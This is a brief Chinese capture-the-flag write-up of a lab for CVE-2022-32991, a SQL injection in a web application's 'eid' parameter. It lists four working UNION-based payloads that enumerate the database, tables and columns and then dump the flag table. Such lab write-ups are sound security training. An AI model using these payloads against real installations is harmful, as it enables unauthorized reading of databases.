春秋云境CVE-2022-32991

进来后看到如下页面，先试试能不能注册

点击register，成功注册

登录后，发现url有?q=1，尝试闭合，没发现注入点

打开burp抓包，发现有挺多get参数，一个一个尝试

试到eid的时候，发现存在字符注入点，而且有回显，可以用union联合查询，确定有5列

eid=5b141b8009cf0'+union+select+1,2,group_concat(database(),version()),4,5%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name='flag'%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(flag),4,5+from+flag%23

最后爆出flag